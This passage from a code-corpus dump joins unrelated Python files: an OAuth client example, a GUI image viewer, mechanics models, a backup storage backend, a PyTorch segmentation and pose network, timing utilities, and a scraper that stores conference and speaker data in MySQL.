session.pop('dev_oauth', None)
return redirect(app.url_for('index'))
@app.route('/authorized')
@remote.authorized_handler
async def authorized(request, data, context):
if data is None:
return 'Access denied: error=%s' % (
request.args['error']
)
resp = {k: v[0] for k, v in data.items()}
if 'oauth_token' in resp:
session['dev_oauth'] = resp
return json(resp)
return text(str(resp))
@app.route('/address')
async def address(request):
ret = await remote.get('address/hangzhou')
if ret.status not in (200, 201):
raise SanicException(ret.data, status_code=ret.status)
return text(ret.raw_data)
@app.route('/method/<name>')
async def method(request, name):
func = getattr(remote, name)
ret = func('method')
if isawaitable(ret):
ret = await ret
return text(ret.raw_data)
@remote.tokengetter
async def get_oauth_token():
if 'dev_oauth' in session:
resp = session['dev_oauth']
return resp['oauth_token'], resp['oauth_token_secret']
return remote
if __name__ == '__main__':
app = Sanic("test_main")
create_client(app)
app.run(host='localhost', port=8000, debug=True, auto_reload=False)
| StarcoderdataPython |
1636091 | import rppFile
import PySimpleGUI as sg
import os.path
from tryouts import mywindow
def printstruct(struct, indent):
print("%s%s children" % ((" " * indent), len(struct)))
for child in struct:
if isinstance(child, sg.Element):
print("%sElement %s %s" % ((" " * indent), child.tag, child.attrib))
gc = child.findall('*')
printstruct(gc, indent + 3)
else:
print("%s%s" % ((" " * indent), child))
file_list_column = [
[
sg.Text("Image Folder"),
sg.In(size=(25, 1), enable_events=True, key="-FOLDER-"),
sg.FolderBrowse(),
],
[
sg.Listbox(
values=[], enable_events=True, size=(40, 20), key="-FILE LIST-"
)
],
]
image_viewer_column = [
[sg.Text("Choose an image from list on left:")],
[sg.Text(size=(40, 1), key="-TOUT-")],
[sg.Image(key="-IMAGE-")],
]
layout = [
[
sg.Column(file_list_column),
sg.VSeperator(),
sg.Column(image_viewer_column),
]
]
def showComplexGUI():
window = sg.Window("Image Viewer", layout)
# Run the Event Loop
while True:
event, values = window.read()
if event == "Exit" or event == sg.WIN_CLOSED:
break
# Folder name was filled in, make a list of files in the folder
if event == "-FOLDER-":
folder = values["-FOLDER-"]
try:
# Get list of files in folder
file_list = os.listdir(folder)
except:
file_list = []
fnames = [
f
for f in file_list
if os.path.isfile(os.path.join(folder, f))
and f.lower().endswith((".png", ".gif"))
]
window["-FILE LIST-"].update(fnames)
elif event == "-FILE LIST-": # A file was chosen from the listbox
try:
filename = os.path.join(
values["-FOLDER-"], values["-FILE LIST-"][0]
)
window["-TOUT-"].update(filename)
window["-IMAGE-"].update(filename=filename)
except:
pass
window.close()
def showSimpleGUI():
sg.theme('DarkAmber') # Add a touch of color
# All the stuff inside your window.
layout = [[sg.Text('Some text on Row 1')],
[sg.Text('Enter something on Row 2'), sg.InputText()],
[sg.Button('Ok'), sg.Button('Cancel')]]
# Create the Window
window = sg.Window('Window Title', layout)
# Event Loop to process "events" and get the "values" of the inputs
while True:
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Cancel': # if user closes window or clicks cancel
break
print('You entered ', values[0])
window.close()
if __name__ == '__main__':
rppfile = rppFile.openFile('/home/roger/rpp/SW5.rpp')
children = rppfile.findall('*')
printstruct(children, 0)
mywindow.showMyWindow() | StarcoderdataPython |
158656 | <reponame>olivierverdier/odelab
from __future__ import division
import numpy as np
from . import NonHolonomic
class Robot(NonHolonomic):
def position(self,u):
return u[:4]
def velocity(self, u):
return u[4:8]
def lag(self,u):
return u[8:10]
def codistribution(self, u):
q2 = self.position(u)[2]
cod = np.zeros([2,4])
cod[0,0] = cod[1,1] = 1.
cod[0,3] = -np.cos(q2)
cod[1,3] = -np.sin(q2)
return cod
def force(self, u):
q = self.position(u)
f = np.zeros_like(q)
f[3] = -10*np.cos(q[3])
return f
def average_force(self, u0, u1):
q0 = self.position(u0)
t0 = q0[3]
t1 = self.position(u1)[3]
if np.allclose(t0,t1):
f = -10*np.cos(t0)
else:
f = -10*(np.sin(t1) - np.sin(t0))/(t1-t0) # check this!
fvec = np.zeros_like(q0)
fvec[3] = f
return fvec
def energy(self, u):
q3 = self.position(u)[3]
return .5*np.sum(self.momentum(u) * self.velocity(u), axis=0) + 10*np.sin(q3)
class VerticalRollingDisk(NonHolonomic):
"""
Vertical Rolling Disk
"""
size = 10 # 4+4+2
def __init__(self, mass=1., radius=1., Iflip=1., Irot=1.):
"""
:mass: mass of the disk
:radius: Radius of the disk
:Iflip: inertia momentum around the "flip" axis
:Irot: inertia momentum, around the axis of rotation symmetry of the disk (perpendicular to it)
"""
self.mass = mass
self.radius = radius
self.Iflip = Iflip
self.Irot = Irot
#def label(self, component):
#return ['x','y',u'φ',u'θ','vx','vy',u'ωφ',u'ωη',u'λ1',u'λ2'][component]
def position(self, u):
"""
Positions x,y,φ (SE(2) coordinates), θ (rotation)
"""
return u[:4]
def velocity(self, u):
return u[4:8]
def average_force(self, u0, u1):
return self.force(u0) # using the fact that the force is zero in this model
def lag(self,u):
return u[8:10]
def codistribution(self, u):
q = self.position(u)
phi = q[2]
R = self.radius
one = np.ones_like(phi)
zero = np.zeros_like(phi)
return np.array([[one, zero, zero, -R*np.cos(phi)],[zero, one, zero, -R*np.sin(phi)]])
def state(self,u):
return u[:8]
def force(self,u):
return np.zeros_like(self.position(u))
def qnorm(self, ut):
return np.sqrt(ut[0]**2 + ut[1]**2)
def energy(self, ut):
return .5*(self.mass*(ut[4]**2 + ut[5]**2) + self.Iflip*ut[6]**2 + self.Irot*ut[7]**2)
def exact(self,t,u0):
"""
Exact solution for initial condition u0 at times t
:param array(N) t: time points of size N
:param array(8+) u0: initial condition
:return: a 10xN matrix of the exact solution
"""
ohm_phi,ohm_theta = u0[6:8]
R = self.radius
rho = ohm_theta*R/ohm_phi
x_0,y_0,phi_0,theta_0 = u0[:4]
phi = ohm_phi*t+phi_0
one = np.ones_like(t)
m = self.mass
return np.vstack([rho*(np.sin(phi)-np.sin(phi_0)) + x_0,
-rho*(np.cos(phi)-np.cos(phi_0)) + y_0,
ohm_phi*t+phi_0,
ohm_theta*t+theta_0,
R*np.cos(phi)*ohm_theta,
R*np.sin(phi)*ohm_theta,
ohm_phi*one,
ohm_theta*one,
-m*ohm_phi*R*ohm_theta*np.sin(phi),
m*ohm_phi*R*ohm_theta*np.cos(phi),])
def initial(self, u00):
"""
Make sure that the constraints are fulfilled at the initial conditions.
"""
u0 = np.copy(u00)
phi = u0[2]
vtheta = u0[7]
u0[4] = np.cos(phi)*vtheta
u0[5] = np.sin(phi)*vtheta
return u0
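# Usage sketch for the class above (illustrative initial condition; assumes numpy as np):
#
#     disk = VerticalRollingDisk()
#     u0 = disk.initial(np.array([0., 0., 0., 0., 0., 0., 1., 2., 0., 0.]))
#     t = np.linspace(0., 1., 11)
#     u = disk.exact(t, u0)   # (10, 11) array; column j is the exact state at t[j]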
| StarcoderdataPython |
3235278 | <gh_stars>0
from pkgutil import extend_path
from .client import APIClient
__path__ = extend_path(__path__, __name__)
__all__ = ['APIClient']
| StarcoderdataPython |
3377469 | <gh_stars>10-100
import collections
import numpy as np
import torch
import torch.nn as nn
from torch.nn import functional as F
from simnet.lib.net.models import simplenet
from simnet.lib.net.post_processing import segmentation_outputs, depth_outputs, pose_outputs, obb_outputs
MODEL_SEM_SEG_HEAD_IN_FEATURES = ['p2', 'p3', 'p4']
MODEL_POSE_HEAD_IN_FEATURES = ['p3', 'p4']
MODEL_SEM_SEG_HEAD_IGNORE_VALUE = 255
MODEL_SEM_SEG_HEAD_COMMON_STRIDE = 4
MODEL_POSE_HEAD_COMMON_STRIDE = 8
MODEL_SEM_SEG_HEAD_LOSS_WEIGHT = 1.0
def c2_msra_fill(module: nn.Module) -> None:
"""
Initialize `module.weight` using the "MSRAFill" implemented in Caffe2.
Also initializes `module.bias` to 0.
Args:
module (torch.nn.Module): module to initialize.
"""
nn.init.kaiming_normal_(module.weight, mode="fan_out", nonlinearity="relu")
if module.bias is not None:
# pyre-fixme[6]: Expected `Tensor` for 1st param but got `Union[nn.Module,
# torch.Tensor]`.
nn.init.constant_(module.bias, 0)
class Conv2d(torch.nn.Conv2d):
"""
A wrapper around :class:`torch.nn.Conv2d` to support empty inputs and more features.
"""
def __init__(self, *args, **kwargs):
"""
Extra keyword arguments supported in addition to those in `torch.nn.Conv2d`:
Args:
norm (nn.Module, optional): a normalization layer
activation (callable(Tensor) -> Tensor): a callable activation function
It assumes that norm layer is used before activation.
"""
norm = kwargs.pop("norm", None)
activation = kwargs.pop("activation", None)
super().__init__(*args, **kwargs)
self.norm = norm
self.activation = activation
def forward(self, x):
if x.numel() == 0 and self.training:
# https://github.com/pytorch/pytorch/issues/12013
assert not isinstance(
self.norm, torch.nn.SyncBatchNorm
), "SyncBatchNorm does not support empty inputs!"
if x.numel() == 0 and TORCH_VERSION <= (1, 4):
assert not isinstance(
self.norm, torch.nn.GroupNorm
), "GroupNorm does not support empty inputs in PyTorch <=1.4!"
# When input is empty, we want to return a empty tensor with "correct" shape,
# So that the following operations will not panic
# if they check for the shape of the tensor.
# This computes the height and width of the output tensor
output_shape = [(i + 2 * p - (di * (k - 1) + 1)) // s + 1 for i, p, di, k, s in
zip(x.shape[-2:], self.padding, self.dilation, self.kernel_size, self.stride)]
output_shape = [x.shape[0], self.weight.shape[0]] + output_shape
empty = _NewEmptyTensorOp.apply(x, output_shape)
if self.training:
# This is to make DDP happy.
# DDP expects all workers to have gradient w.r.t the same set of parameters.
_dummy = sum(x.view(-1)[0] for x in self.parameters()) * 0.0
return empty + _dummy
else:
return empty
x = super().forward(x)
if self.norm is not None:
x = self.norm(x)
if self.activation is not None:
x = self.activation(x)
return x
def get_norm(norm, out_channels):
"""
Args:
norm (str or callable): either one of BN, SyncBN, FrozenBN, GN;
or a callable that takes a channel number and returns
the normalization layer as a nn.Module.
Returns:
nn.Module or None: the normalization layer
"""
if out_channels == 32:
N = 16
else:
N = 32
if isinstance(norm, str):
if len(norm) == 0:
return None
norm = {
"BN": torch.nn.BatchNorm2d,
#"SyncBN": NaiveSyncBatchNorm,
#"FrozenBN": FrozenBatchNorm2d,
"GN": lambda channels: nn.GroupNorm(N, channels),
#"nnSyncBN": nn.SyncBatchNorm, # keep for debugging
}[norm]
return norm(out_channels)
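# e.g. get_norm("GN", 64) -> nn.GroupNorm(32, 64) and get_norm("GN", 32) -> nn.GroupNorm(16, 32);
# an empty norm string returns None, in which case the convolutions below keep their bias term.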
class SemSegFPNHead(nn.Module):
"""
A semantic segmentation head described in detail in the Panoptic Feature Pyramid Networks paper
(https://arxiv.org/abs/1901.02446). It takes FPN features as input and merges information from
all levels of the FPN into single output.
"""
def __init__(self, input_shape, num_classes, model_norm='BN', num_filters_scale=4):
super().__init__()
MODEL_SEM_SEG_HEAD_NORM = model_norm
MODEL_SEM_SEG_HEAD_CONVS_DIM = 128 // num_filters_scale
self.in_features = MODEL_SEM_SEG_HEAD_IN_FEATURES
feature_strides = {k: v.stride for k, v in input_shape.items()}
feature_channels = {k: v.channels for k, v in input_shape.items()}
    self.ignore_value = MODEL_SEM_SEG_HEAD_IGNORE_VALUE
conv_dims = MODEL_SEM_SEG_HEAD_CONVS_DIM
self.common_stride = MODEL_SEM_SEG_HEAD_COMMON_STRIDE
norm = MODEL_SEM_SEG_HEAD_NORM
self.bilinear_upsample = nn.Upsample(
scale_factor=self.common_stride, mode="bilinear", align_corners=False
)
self.scale_heads = []
for in_feature in self.in_features:
head_ops = []
head_length = max(1, int(np.log2(feature_strides[in_feature]) - np.log2(self.common_stride)))
for k in range(head_length):
norm_module = get_norm(norm, conv_dims)
conv = Conv2d(
feature_channels[in_feature] if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=1,
padding=1,
bias=not norm,
norm=norm_module,
activation=F.relu,
)
c2_msra_fill(conv)
head_ops.append(conv)
if feature_strides[in_feature] != self.common_stride:
head_ops.append(nn.Upsample(scale_factor=2, mode="bilinear", align_corners=False))
self.scale_heads.append(nn.Sequential(*head_ops))
self.add_module(in_feature, self.scale_heads[-1])
self.predictor = Conv2d(conv_dims, num_classes, kernel_size=1, stride=1, padding=0)
c2_msra_fill(self.predictor)
def forward(self, features, targets=None):
"""
Returns:
In training, returns (None, dict of losses)
In inference, returns (predictions, {})
"""
x = self.layers(features)
x = self.bilinear_upsample(x)
return x
def layers(self, features):
for i, f in enumerate(self.in_features):
if i == 0:
x = self.scale_heads[i](F.relu(features[f]))
else:
        x = x + self.scale_heads[i](F.relu(features[f]))
x = self.predictor(x)
return x
def losses(self, predictions, targets):
predictions = F.interpolate(
predictions, scale_factor=self.common_stride, mode="bilinear", align_corners=False
)
loss = F.cross_entropy(predictions, targets, reduction="mean", ignore_index=self.ignore_value)
return loss
class PoseFPNHead(nn.Module):
"""
A semantic segmentation head described in detail in the Panoptic Feature Pyramid Networks paper
(https://arxiv.org/abs/1901.02446). It takes FPN features as input and merges information from
all levels of the FPN into single output.
"""
def __init__(self, input_shape, num_classes, model_norm='BN', num_filters_scale=4):
super().__init__()
MODEL_SEM_SEG_HEAD_NORM = model_norm
MODEL_SEM_SEG_HEAD_CONVS_DIM = 128 // num_filters_scale
self.in_features = MODEL_POSE_HEAD_IN_FEATURES
feature_strides = {k: v.stride for k, v in input_shape.items()}
feature_channels = {k: v.channels for k, v in input_shape.items()}
    self.ignore_value = MODEL_SEM_SEG_HEAD_IGNORE_VALUE
conv_dims = MODEL_SEM_SEG_HEAD_CONVS_DIM
self.common_stride = MODEL_POSE_HEAD_COMMON_STRIDE
norm = MODEL_SEM_SEG_HEAD_NORM
self.scale_heads = []
for in_feature in self.in_features:
head_ops = []
head_length = max(1, int(np.log2(feature_strides[in_feature]) - np.log2(self.common_stride)))
for k in range(head_length):
norm_module = get_norm(norm, conv_dims)
conv = Conv2d(
feature_channels[in_feature] if k == 0 else conv_dims,
conv_dims,
kernel_size=3,
stride=1,
padding=1,
bias=not norm,
norm=norm_module,
activation=F.relu,
)
c2_msra_fill(conv)
head_ops.append(conv)
if feature_strides[in_feature] != self.common_stride:
head_ops.append(nn.Upsample(scale_factor=2, mode="bilinear", align_corners=False))
self.scale_heads.append(nn.Sequential(*head_ops))
self.add_module(in_feature, self.scale_heads[-1])
self.predictor = Conv2d(conv_dims, num_classes, kernel_size=1, stride=1, padding=0)
c2_msra_fill(self.predictor)
def forward(self, features, targets=None):
"""
Returns:
In training, returns (None, dict of losses)
In inference, returns (predictions, {})
"""
x = self.layers(features)
return x
def layers(self, features):
for i, f in enumerate(self.in_features):
if i == 0:
x = self.scale_heads[i](F.relu(features[f]))
else:
        x = x + self.scale_heads[i](F.relu(features[f]))
x = self.predictor(x)
return x
class ShapeSpec(collections.namedtuple("_ShapeSpec", ["channels", "height", "width", "stride"])):
"""
A simple structure that contains basic shape specification about a tensor.
It is often used as the auxiliary inputs/outputs of models,
to obtain the shape inference ability among pytorch modules.
Attributes:
channels:
height:
width:
stride:
"""
def __new__(cls, *, channels=None, height=None, width=None, stride=None):
return super().__new__(cls, channels, height, width, stride)
def res_fpn(hparams):
return PanopticNet(hparams)
class DepthHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, hparams):
super().__init__()
self.head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.hparams = hparams
def forward(self, features):
depth_pred = self.head.forward(features)
depth_pred = depth_pred.squeeze(dim=1)
return depth_outputs.DepthOutput(depth_pred, self.hparams.loss_depth_refine_mult)
class SegmentationHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, num_classes, hparams):
super().__init__()
self.head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=num_classes,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.hparams = hparams
def forward(self, features):
pred = self.head.forward(features)
return segmentation_outputs.SegmentationOutput(pred, self.hparams)
class PoseHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, hparams):
super().__init__()
self.hparams = hparams
self.heatmap_head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.vertex_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=16,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.z_centroid_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
def forward(self, features):
z_centroid_output = self.z_centroid_head.forward(features).squeeze(dim=1)
heatmap_output = self.heatmap_head.forward(features).squeeze(dim=1)
vertex_output = self.vertex_head.forward(features)
return pose_outputs.PoseOutput(heatmap_output, vertex_output, z_centroid_output, self.hparams)
class OBBHead(nn.Module):
def __init__(self, backbone_output_shape_4x, backbone_output_shape_8x, hparams):
super().__init__()
self.hparams = hparams
self.heatmap_head = SemSegFPNHead(
backbone_output_shape_4x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.vertex_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=16,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.z_centroid_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=1,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
self.rotation_head = PoseFPNHead(
backbone_output_shape_8x,
num_classes=6,
model_norm=hparams.model_norm,
num_filters_scale=hparams.num_filters_scale
)
def forward(self, features):
z_centroid_output = self.z_centroid_head.forward(features).squeeze(dim=1)
heatmap_output = self.heatmap_head.forward(features).squeeze(dim=1)
vertex_output = self.vertex_head.forward(features)
rotation_output = self.rotation_head.forward(features)
return obb_outputs.OBBOutput(
heatmap_output, vertex_output, z_centroid_output, rotation_output, self.hparams
)
class PanopticNet(nn.Module):
def __init__(self, hparams):
super().__init__()
self.hparams = hparams
self.backbone = simplenet.StereoBackbone(hparams)
# ResFPN used p2,p3,p4,p5 (64 channels)
# DRN uses only p2,p3,p4 (no need for p5 since dilation increases striding naturally)
backbone_output_shape_4x = {
#'p0': ShapeSpec(channels=64, height=None, width=None, stride=1),
#'p1': ShapeSpec(channels=64, height=None, width=None, stride=2),
'p2': ShapeSpec(channels=64, height=None, width=None, stride=4),
'p3': ShapeSpec(channels=64, height=None, width=None, stride=8),
'p4': ShapeSpec(channels=64, height=None, width=None, stride=16),
#'p5': ShapeSpec(channels=64, height=None, width=None, stride=32),
}
backbone_output_shape_8x = {
#'p0': ShapeSpec(channels=64, height=None, width=None, stride=1),
#'p1': ShapeSpec(channels=64, height=None, width=None, stride=2),
#'p2': ShapeSpec(channels=64, height=None, width=None, stride=4),
'p3': ShapeSpec(channels=64, height=None, width=None, stride=8),
'p4': ShapeSpec(channels=64, height=None, width=None, stride=16),
#'p5': ShapeSpec(channels=64, height=None, width=None, stride=32),
}
# Add depth head.
self.depth_head = DepthHead(backbone_output_shape_4x, backbone_output_shape_8x, hparams)
# Add segmentation head.
self.seg_head = SegmentationHead(backbone_output_shape_4x, backbone_output_shape_8x, 5, hparams)
# Add pose heads.
self.pose_head = OBBHead(backbone_output_shape_4x, backbone_output_shape_8x, hparams)
def forward(self, image, step):
features = self.backbone.forward(image, step)
small_disp_output = features['small_disp']
small_disp_output = small_disp_output.squeeze(dim=1)
if self.hparams.frozen_stereo_checkpoint is not None:
small_disp_output = small_disp_output.detach()
assert False
small_depth_output = depth_outputs.DepthOutput(small_disp_output, self.hparams.loss_depth_mult)
seg_output = self.seg_head.forward(features)
depth_output = self.depth_head.forward(features)
pose_output = self.pose_head.forward(features)
# TODO(kevin): Remove unused output heads
box_output = None
keypoint_output = None
return seg_output, depth_output, small_depth_output, pose_output, box_output, keypoint_output
| StarcoderdataPython |
13294 | <reponame>kwu83tw/freezer
# (c) Copyright 2014,2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
from oslo_serialization import jsonutils as json
from freezer.storage import physical
class FsLikeStorage(physical.PhysicalStorage, metaclass=abc.ABCMeta):
_type = 'fslike'
def __init__(self, storage_path,
max_segment_size, skip_prepare=False):
super(FsLikeStorage, self).__init__(
storage_path=storage_path,
max_segment_size=max_segment_size,
skip_prepare=skip_prepare)
def prepare(self):
self.create_dirs(self.storage_path)
def info(self):
pass
def write_backup(self, rich_queue, backup):
"""
Stores backup in storage
:type rich_queue: freezer.utils.streaming.RichQueue
:type backup: freezer.storage.base.Backup
"""
backup = backup.copy(storage=self)
path = backup.data_path
self.create_dirs(path.rsplit('/', 1)[0])
with self.open(path, mode='wb') as \
b_file:
for message in rich_queue.get_messages():
b_file.write(message)
def backup_blocks(self, backup):
"""
:param backup:
:type backup: freezer.storage.base.Backup
:return:
"""
with self.open(backup.data_path, 'rb') as backup_file:
while True:
chunk = backup_file.read(self.max_segment_size)
if len(chunk):
yield chunk
else:
break
@abc.abstractmethod
def open(self, filename, mode):
"""
:type filename: str
:param filename:
:type mode: str
:param mode:
:return:
"""
pass
def add_stream(self, stream, package_name, headers=None):
"""
:param stream: data
:param package_name: path
:param headers: backup metadata information
:return:
"""
split = package_name.rsplit('/', 1)
# create backup_basedir
backup_basedir = "{0}/{1}".format(self.storage_path,
package_name)
self.create_dirs(backup_basedir)
# define backup_data_name
backup_basepath = "{0}/{1}".format(backup_basedir,
split[0])
backup_metadata = "%s/metadata" % backup_basedir
# write backup to backup_basepath
with self.open(backup_basepath, 'wb') as backup_file:
for el in stream:
backup_file.write(el)
# write data metadata to backup_metadata
with self.open(backup_metadata, 'wb') as backup_meta:
backup_meta.write(json.dumps(headers))
| StarcoderdataPython |
3333162 | <filename>flowcat/utils/time_timers.py<gh_stars>1-10
"""
Basic functions for working with timestamps and timing functions.
"""
import time
import datetime
import contextlib
import collections
import numpy as np
TIMESTAMP_FORMAT = "%Y%m%d_%H%M%S"
def str_to_date(strdate: str) -> datetime.date:
return datetime.datetime.strptime(strdate, "%Y-%m-%d").date()
def str_to_datetime(strdate: str) -> datetime.datetime:
if len(strdate) == 10:
return datetime.datetime.strptime(strdate, "%Y-%m-%d")
if len(strdate) == 19:
return datetime.datetime.strptime(strdate, "%Y-%m-%dT%H:%M:%S")
return datetime.datetime.strptime(strdate, "%Y-%m-%dT%H:%M:%S.%f")
def create_stamp(stamp: "datetime" = None) -> str:
"""Create timestamp usable for filepaths"""
if stamp is None:
stamp = datetime.datetime.now()
return stamp.strftime(TIMESTAMP_FORMAT)
@contextlib.contextmanager
def timer(title):
"""Take the time for the enclosed block."""
time_a = time.time()
yield
time_b = time.time()
time_diff = time_b - time_a
print(f"{title}: {time_diff:.3}s")
def time_generator_logger(generator, rolling_len=20):
"""Time the given generator.
Args:
generator: Will be executed and results are passed through.
rolling_len: Number of last values for generation of average time.
Returns:
Any value returned from the given generator.
"""
circ_buffer = collections.deque(maxlen=rolling_len)
time_a = time.time()
for res in generator:
time_b = time.time()
time_d = time_b - time_a
circ_buffer.append(time_d)
time_rolling = np.mean(circ_buffer)
print(f"Training time: {time_d}s Rolling avg: {time_rolling}s")
time_a = time_b
yield res
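# Illustrative usage (not from the original file): wrap a generator to log per-step timing
# with a rolling average over the last `rolling_len` steps.
#   def steps():
#       for i in range(100):
#           yield i
#   for step in time_generator_logger(steps(), rolling_len=10):
#       pass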
| StarcoderdataPython |
169382 | # coding=utf-8
import redis
import requests
from lxml import etree
import pymysql
import threading
from config import logger
import re
from User_Agent import User_Agent
import random
class Meeting:
# Keep both the organizer and organizer_id fields: one makes join queries easy, the other allows direct reads, and the organizer info may be missing
title = ""
url = ""
start_date = ""
end_date = ""
area = ""
specialties = ""
organizer_id = 0
organizer_url = ""
organizer = ""
class GainDetailInfoThread(threading.Thread):
"""
Fetch the detailed information for each conference
"""
def __init__(self, thread_name=None):
threading.Thread.__init__(self)
self.headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept - Encoding': 'gzip',
'Cache-Control': 'no-cache',
'User-Agent': random.choice(User_Agent),
'Connection': 'keep-alive',
}
# Create a Redis connection
self.redis_cli = redis.StrictRedis(host='localhost', port=6379, db=7)
# Create a MySQL connection
self.mysql_cli = pymysql.connect(host='localhost', port=3306, database='conference', user='root', password='<PASSWORD>', charset='utf8')
self.cursor = self.mysql_cli.cursor()
self.thread_name = thread_name
def run(self):
if self.thread_name:
print self.thread_name + ' started crawling'
self.gain_info()
print self.thread_name + ' finished crawling'
def gain_info(self):
"""
Fetch information
:return:
"""
# Loop forever, pulling URLs from Redis
i = 1
while True:
print i
i += 1
try:
url = self.redis_cli.spop('backup_urls1')
print url
except Exception as e:
logger.error(e)
logger.error('Failed to pop a URL from Redis')
if not url:
break
# Try opening the page several times: break out as soon as it opens, retry on failure
# Start the attempts
times = 4
html_selector = None
while times > 0:
times -= 1
try:
"""
proxies = { "http": "http://10.10.1.10:3128", "https": "http://10.10.1.10:1080", }
requests.get("http://example.org", proxies=proxies)
"""
content = requests.get(url, headers=self.headers, timeout=10)
# Parse the response
html_selector = etree.HTML(content.text)
print "Fetched detail page"
break
except Exception as e:
logger.error(e)
logger.error('Failed to open the page')
# if len(content.text) == 0:
# return
if not html_selector:
continue
# The page has data; pull out the fields we need
# Link address
current_url = url
# Conference title
try:
title = html_selector.xpath('//h1/text()')[0]
title = title.replace("'", "\\\'").replace('"', '\\\"')
# Get the conference start and end dates
date_str = html_selector.xpath('//div[@class="date"]/text()')
if date_str:
date_str = date_str[0]
# Extract the date string
date_str = date_str.replace(',', ' ').replace('|', ' ').replace('\t', '').strip()
date_str = re.match(r'([^ ]+) ([\d]{1,2}) - ([a-zA-Z]{3})?.*?([\d]{1,2}).*?([\d]{4})', date_str)
if date_str:
month1 = date_str.group(1)
start_day = date_str.group(2)
month2 = date_str.group(3)
end_day = date_str.group(4)
year = date_str.group(5)
# Month lookup table used to convert English month names to numeric strings
else:
date_str = "null"
Month = {
'Jan': '01',
'Feb': '02',
'Mar': '03',
'Apr': '04',
'May': '05',
'Jun': '06',
'Jul': '07',
'Aug': '08',
'Sep': '09',
'Oct': '10',
'Nov': '11',
'Dec': '12'
}
# Start and end dates, formatted like '1990-03-20'
if not month2:
start_date = year + '-' + Month.get(month1) + '-' + start_day
end_date = year + '-' + Month.get(month1) + '-' + end_day
else:
start_date = year + '-' + Month.get(month1) + '-' + start_day
end_date = year + '-' + Month.get(month2) + '-' + end_day
# Get the regions where the conference is held (a list)
area = html_selector.xpath('//div[@class="date"]/a/text()')
if area:
# Region
if len(area)==1:
area = area[0]
else:
area = area[0] + ',' + area[1]
else:
area = "null"
# Organizing body
print area + "*****************"
organizer = html_selector.xpath('//div[@class="speakers marT10"]/span/a/text()')
if organizer:
organizer = organizer[0]
organizer_url = html_selector.xpath('//div[@class="speakers marT10"]/span/a/@href')[0]
# Specialties; a conference may have several
specialties_list = html_selector.xpath('//div[@class="speakers"]/span/a/text()')
except Exception as e:
logger.error(e)
logger.error("提取信息错误")
continue
specialities = ''
# The result can later be matched with a fuzzy (LIKE) query
for spe in specialties_list:
specialities += (spe + ',')
# Final specialties string
specialities = specialities.strip(',')
# Get speaker information
# speakers_list = html_selector.xpath('//h5/a/text()')
meeting = Meeting()
meeting.url = current_url
meeting.title = title
meeting.start_date = start_date
meeting.end_date = end_date
meeting.area = area
meeting.specialties = specialities
meeting.organizer = organizer
# Look up the organizer's id in the organizers table by its URL
if organizer:
meeting.organizer_url = organizer_url
else:
meeting.organizer_url = "null"
# Save the conference info; returns its id in the conferences table
meeting_id = self.save_meeting(meeting)
print meeting_id
# If no id came back, stop here
if not meeting_id:
continue
# Look up speaker information
# Check for a "view all" link: if present, request it; otherwise read the speakers listed on this page
viewall = html_selector.xpath('//a[@data-type="speaker"]')
# If there is a "view all" link, request it directly
if viewall:
print "viewall"
orgSpeakersData = re.findall(r"""conf_speak_data = "(.*?)";""", content.text)[0]
conftypeid = html_selector.xpath('//input[@name="conftypeid"]/@value')[0]
conftype = "Speaking at " + title
speakers_url_list = self.gain_viewall(orgSpeakersData, conftype, conftypeid)
else:
# No "view all" link; read the speaker info directly from this page
speakers_url_list = html_selector.xpath('//div[@id="speaker_confView"]/div/div/div/a/@href')
if not speakers_url_list:
continue
for speaker_url in speakers_url_list:
self.save_relationship(speaker_url, meeting_id)
def gain_viewall(self, orgSpeakersData, conftype, conftypeid):
"请求发言人信息的viewall"
url = "https://www.emedevents.com/view-all"
print "gain_viewall"
# POST request payload
post_data = {
"orgSpeakersData": orgSpeakersData,
"conftype": conftype,
"conftypeid": conftypeid,
"spr_type": "detail_sat"
}
i = 1
while i <=4:
i += 1
try:
response = requests.post(url, data=post_data, headers=self.headers)
selector = etree.HTML(response.text)
break
except Exception as e:
logger.error(e)
logger.error("查询viewall失败")
selector = None
# 请求失败的话,直接返回
if selector is None:
return
speakers_url_list = selector.xpath('//h3/../@href')
print speakers_url_list
return speakers_url_list
def save_meeting(self, meeting):
"""
Save conference information; takes a Meeting object as its argument
:param meeting:
:return: the id of this conference in the database
"""
print "save_meetings"
try:
sql = """select id from organizers where url = '%s'""" % meeting.organizer_url
self.cursor.execute(sql)
organizer_id = self.cursor.fetchone()
if not organizer_id:
organizer_id = "null"
insert_sql = """insert into conferences(title, url, start_date, end_date, area, specialties, organizer, organizer_id) VALUES
("%s", "%s", "%s", "%s", "%s", "%s", "%s", %s)""" % (
meeting.title, meeting.url, meeting.start_date, meeting.end_date, meeting.area, meeting.specialties,meeting.organizer,
organizer_id)
else:
